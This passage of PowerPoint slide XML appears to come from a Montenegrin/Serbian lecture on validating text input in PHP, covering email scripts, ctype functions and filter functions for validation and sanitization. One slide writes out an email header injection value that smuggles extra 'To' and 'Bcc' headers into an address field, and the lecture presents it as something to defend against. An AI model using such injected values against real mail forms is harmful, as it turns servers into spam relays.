            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>podrazumijeva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razmjenu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>povjerljivih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>informacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>predstavljati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>veliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sigurnosni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> problem.</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-ME" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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5183557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670FF-A5E4-4F5B-AFFE-3CFB864B8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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tekstualnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ulaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>…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FAA12-2410-49AF-B682-4D0FF12985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995363"/>
            <a:ext cx="7194550" cy="514667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/>
              <a:t>Ova </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>skripta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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svakako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>raditi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>očekivano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vjerujemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisniku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da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zaista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>unijeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispravne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Pošto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> mu ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>smijemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vjerovati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napadač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>veoma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>lako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>iskoristiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovakvu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>skriptu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>slanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> SPAM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>poruka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našeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>servera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Dovoljno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>umjesto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>adrese</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>unese</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nešto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r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sz="2800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Jasno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>će</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>direktno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kopirati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da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poruka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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>poslata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onoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>adresa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napadač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>želi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Rješenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovog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mnogih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>drugih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>problema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>leži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>filtriranju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sr-Latn-ME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8C00CD-2EFF-490A-A4F9-0CD24954F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" y="3505200"/>
            <a:ext cx="8543925" cy="1219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example@example.com&gt; \n\r To: &lt;example2@example.com&gt; \n\r Bcc:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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&lt;example3@example.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1072916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0E92F-AADD-4DF5-92F4-6F33957A3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Ctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>funkcije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A7536-69C3-4FDF-8665-DC5BEEE50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r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Character type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odlične</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogućnosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pritom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imaju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odlične</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>performanse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Ove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provjeravaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karakter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rezultat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jedino</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zadovoljava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>postavljeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kriterijum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>suprotom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nedozvoljenog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tipa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>rezultat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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FALSE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" b="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9B39FDB5-BF38-4CB7-8CD7-7194E3CFD0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860385"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="647700" y="3509010"/>
          <a:ext cx="7962900" cy="2781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7479">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2768138588"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5275421">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="34923937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2000" b="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Funkcija</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2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2000" b="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Opis</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2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1995644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ctype_alnum</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="18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Provjera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slovnih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brojnih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karaktera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4117108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ctype_alpha</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="18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Provjera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slovnih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karaktera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3424066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ctype_digit</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="18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Provjera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brojnih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karaktera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3114293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ctype_lower</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="18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Provjera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malih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slova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2526882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ctype_upper</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="18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Provjera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velikih</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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slova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4206351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83139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688C9-AEB1-4914-8F0F-C8135A886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Filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>funkcije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960D7-8E66-4D72-A322-88D454C53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066800"/>
            <a:ext cx="7194550" cy="50752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/>
              <a:t>Filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dvije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogućnosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provjere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> string (validate) po </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>postavljenim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kriterijumima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>isprave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (sanitization) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odgovara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kriterijumima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Svakako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>preporučljivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koristi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>validaciju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ali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ispravljanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svoju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>široku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>primenu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r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r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Prvi</a:t>
            </a:r>
            <a:r>
